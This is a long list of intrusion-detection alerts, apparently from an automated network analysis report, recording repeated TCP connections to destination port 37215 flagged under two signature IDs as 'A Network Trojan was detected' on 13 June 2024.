              SID:2829579
              Source Port:40878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350115
              SID:2835222
              Source Port:57882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676889
              SID:2835222
              Source Port:55392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090869
              SID:2829579
              Source Port:51996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078656
              SID:2829579
              Source Port:45556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223979
              SID:2835222
              Source Port:46664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039641
              SID:2829579
              Source Port:34990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730825
              SID:2829579
              Source Port:54280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377521
              SID:2829579
              Source Port:60672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043108
              SID:2835222
              Source Port:57336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306365
              SID:2829579
              Source Port:48122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406898
              SID:2829579
              Source Port:37328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091696
              SID:2829579
              Source Port:49782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245158
              SID:2829579
              Source Port:37870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357654
              SID:2829579
              Source Port:47962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872560
              SID:2829579
              Source Port:41732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802661
              SID:2835222
              Source Port:37810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418370
              SID:2835222
              Source Port:32912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247026
              SID:2835222
              Source Port:53190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638300
              SID:2829579
              Source Port:53308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840122
              SID:2829579
              Source Port:42466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248532
              SID:2835222
              Source Port:49562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404035
              SID:2835222
              Source Port:54168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694531
              SID:2835222
              Source Port:55024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320409
              SID:2829579
              Source Port:41444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710321
              SID:2829579
              Source Port:53562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789333
              SID:2829579
              Source Port:56164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369749
              SID:2829579
              Source Port:39500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655843
              SID:2835222
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090207
              SID:2835222
              Source Port:55684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238961
              SID:2829579
              Source Port:38048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276833
              SID:2835222
              Source Port:45514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567013
              SID:2829579
              Source Port:33706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196394
              SID:2835222
              Source Port:33090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615193
              SID:2829579
              Source Port:34180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884925
              SID:2835222
              Source Port:35334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505677
              SID:2835222
              Source Port:48434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458347
              SID:2835222
              Source Port:41702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830482
              SID:2835222
              Source Port:48256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573332
              SID:2829579
              Source Port:46252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079505
              SID:2835222
              Source Port:48330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315740
              SID:2829579
              Source Port:43436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823053
              SID:2829579
              Source Port:60288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156647
              SID:2835222
              Source Port:58298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373833
              SID:2835222
              Source Port:45044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572611
              SID:2829579
              Source Port:58728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.748951
              SID:2835222
              Source Port:49372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181125
              SID:2829579
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417588
              SID:2829579
              Source Port:60296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567701
              SID:2835222
              Source Port:33452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223595
              SID:2835222
              Source Port:49920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403958
              SID:2829579
              Source Port:39004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791704
              SID:2829579
              Source Port:53178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240689
              SID:2829579
              Source Port:41568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349834
              SID:2829579
              Source Port:38190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992367
              SID:2829579
              Source Port:47704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074013
              SID:2835222
              Source Port:44276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697608
              SID:2835222
              Source Port:43152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404767
              SID:2835222
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298698
              SID:2829579
              Source Port:50276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170746
              SID:2829579
              Source Port:32896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276232
              SID:2829579
              Source Port:48822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079746
              SID:2829579
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310202
              SID:2835222
              Source Port:43522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357839
              SID:2829579
              Source Port:48798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274767
              SID:2829579
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093098
              SID:2829579
              Source Port:45694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487083
              SID:2829579
              Source Port:54724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938171
              SID:2835222
              Source Port:46964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822334
              SID:2835222
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256678
              SID:2829579
              Source Port:33996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306916
              SID:2829579
              Source Port:45324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419991
              SID:2835222
              Source Port:58388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404518
              SID:2829579
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679965
              SID:2835222
              Source Port:46124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.675938
              SID:2829579
              Source Port:42602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089524
              SID:2835222
              Source Port:44028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615231
              SID:2835222
              Source Port:49324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995301
              SID:2835222
              Source Port:52782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406268
              SID:2835222
              Source Port:46508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452730
              SID:2829579
              Source Port:60732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181698
              SID:2829579
              Source Port:55826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159563
              SID:2835222
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299012
              SID:2835222
              Source Port:56362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404410
              SID:2835222
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375464
              SID:2835222
              Source Port:51098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508625
              SID:2829579
              Source Port:47688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993055
              SID:2835222
              Source Port:46304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975709
              SID:2835222
              Source Port:57444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726394
              SID:2829579
              Source Port:43714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978966
              SID:2829579
              Source Port:56072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301487
              SID:2829579
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.566964
              SID:2829579
              Source Port:54018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484815
              SID:2829579
              Source Port:60358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094636
              SID:2829579
              Source Port:60340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199058
              SID:2829579
              Source Port:43922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276216
              SID:2829579
              Source Port:46212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027324
              SID:2829579
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100673
              SID:2835222
              Source Port:40616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247475
              SID:2835222
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247715
              SID:2835222
              Source Port:34636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784939
              SID:2829579
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802070
              SID:2835222
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277467
              SID:2835222
              Source Port:48058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164285
              SID:2835222
              Source Port:46922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977342
              SID:2835222
              Source Port:43040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276433
              SID:2835222
              Source Port:57210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349796
              SID:2829579
              Source Port:48600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608885
              SID:2829579
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553467
              SID:2829579
              Source Port:51908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978513
              SID:2829579
              Source Port:54262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884023
              SID:2829579
              Source Port:54920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060312
              SID:2835222
              Source Port:42994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659421
              SID:2835222
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546068
              SID:2829579
              Source Port:34156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042614
              SID:2829579
              Source Port:45950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841142
              SID:2835222
              Source Port:60206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.138029
              SID:2835222
              Source Port:53066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224949
              SID:2835222
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256512
              SID:2835222
              Source Port:48916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509095
              SID:2835222
              Source Port:45448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079211
              SID:2835222
              Source Port:38744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174543
              SID:2829579
              Source Port:60080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300734
              SID:2829579
              Source Port:45886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216717
              SID:2835222
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409809
              SID:2829579
              Source Port:37588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215112
              SID:2829579
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749099
              SID:2835222
              Source Port:53184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401125
              SID:2829579
              Source Port:56538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676962
              SID:2829579
              Source Port:47956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276477
              SID:2835222
              Source Port:37414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012792
              SID:2835222
              Source Port:39470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109356
              SID:2835222
              Source Port:38956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308525
              SID:2835222
              Source Port:60116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836193
              SID:2835222
              Source Port:44768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971778
              SID:2835222
              Source Port:49924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321443
              SID:2829579
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610618
              SID:2829579
              Source Port:56220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678465
              SID:2835222
              Source Port:45696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369348
              SID:2835222
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254094
              SID:2829579
              Source Port:37986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217609
              SID:2835222
              Source Port:37224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420247
              SID:2829579
              Source Port:41352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457191
              SID:2829579
              Source Port:38766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091684
              SID:2829579
              Source Port:36466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567942
              SID:2835222
              Source Port:33526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111117
              SID:2835222
              Source Port:39516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307026
              SID:2829579
              Source Port:49060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552061
              SID:2829579
              Source Port:42358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935491
              SID:2829579
              Source Port:51944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133487
              SID:2835222
              Source Port:52818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675869
              SID:2829579
              Source Port:35918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680059
              SID:2835222
              Source Port:53900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041681
              SID:2835222
              Source Port:56406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659476
              SID:2829579
              Source Port:56784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779999
              SID:2835222
              Source Port:49210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940779
              SID:2835222
              Source Port:41344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819673
              SID:2835222
              Source Port:34122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339812
              SID:2835222
              Source Port:56142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753391
              SID:2835222
              Source Port:37708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057800
              SID:2829579
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274651
              SID:2835222
              Source Port:40334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372549
              SID:2835222
              Source Port:58518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456399
              SID:2835222
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.402981
              SID:2829579
              Source Port:37644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309770
              SID:2835222
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972933
              SID:2835222
              Source Port:42750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369067
              SID:2829579
              Source Port:57726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158296
              SID:2829579
              Source Port:52318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211030
              SID:2829579
              Source Port:60176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485915
              SID:2829579
              Source Port:49332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437779
              SID:2835222
              Source Port:34308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545961
              SID:2835222
              Source Port:38664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321178
              SID:2829579
              Source Port:46078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552522
              SID:2835222
              Source Port:52500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454021
              SID:2829579
              Source Port:58026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039668
              SID:2835222
              Source Port:58776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727789
              SID:2835222
              Source Port:46432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152278
              SID:2835222
              Source Port:34890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354958
              SID:2829579
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654042
              SID:2829579
              Source Port:53424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377143
              SID:2829579
              Source Port:44146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402128
              SID:2829579
              Source Port:55722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167636
              SID:2829579
              Source Port:50384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990346
              SID:2829579
              Source Port:35616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607963
              SID:2835222
              Source Port:59618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755483
              SID:2829579
              Source Port:35162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169559
              SID:2829579
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348353
              SID:2829579
              Source Port:41094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274815
              SID:2835222
              Source Port:36142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177305
              SID:2829579
              Source Port:46796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348388
              SID:2835222
              Source Port:49848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632816
              SID:2835222
              Source Port:34276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509157
              SID:2835222
              Source Port:37510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259508
              SID:2835222
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506108
              SID:2835222
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670488
              SID:2835222
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213991
              SID:2835222
              Source Port:55718
              Destination Port:37215
